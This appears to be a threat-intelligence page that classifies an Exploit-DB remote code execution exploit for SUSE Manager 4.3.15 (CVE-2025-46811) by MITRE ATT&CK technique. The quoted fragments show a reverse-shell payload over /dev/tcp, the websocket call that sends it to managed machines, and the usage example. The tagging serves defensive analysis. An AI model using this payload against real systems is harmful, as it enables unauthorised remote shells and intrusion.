TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Exploit-DB

[webapps] SUSE Manager 4.3.15 - Code Execution

2026-04-30 · Read original ↗

ATT&CK techniques detected

5 predictions
T1059.006Python
90%
"shell pops up. # example : # python3 cve - 2025 - 46811. py - - ip 192. 168. 10. 126 - - port 443 - - host - ip 192. 168. 10. 113 - - host - port 9001 - - ssl # # # # program constraints # # # # payload = f " sh - i > & / dev / tcp / host _ ip / host _ port 0 > & 1 " # reverse sh…"
T1059.006Python
78%
"[ webapps ] suse manager 4. 3. 15 - code execution suse manager 4. 3. 15 - code execution # exploit title : suse manager 4. 3. 15 - code execution # date : 29. 01. 2026 # exploit author : wiktor maj # vendor homepage : https : / / www. uyuni - project. org / # software link : htt…"
T1059.004Unix Shell
56%
"shell pops up. # example : # python3 cve - 2025 - 46811. py - - ip 192. 168. 10. 126 - - port 443 - - host - ip 192. 168. 10. 113 - - host - port 9001 - - ssl # # # # program constraints # # # # payload = f " sh - i > & / dev / tcp / host _ ip / host _ port 0 > & 1 " # reverse sh…"
T1071.001Web Protocols
37%
"host _ port ) ) websocket _ connection. send ( json. dumps ( { " preview " : false, " target " : target, " command " : payload } ) ) if _ _ name _ _ = = " _ _ main _ _ " : args = parse _ args ( ) websocket _ connection = none try : websocket _ connection, minions = get _ minions …"
T1190Exploit Public-Facing Application
35%
"parser = argparse. argumentparser ( description = " implementation of cve - 2025 - 46811 exploit for suse manager & uyuni. ", add _ help = false ) parser. add _ argument ( " - h ", " - - help ", action = " help ", default = argparse. suppress, help = " display this help text and …"

Summary

SUSE Manager 4.3.15 - Code Execution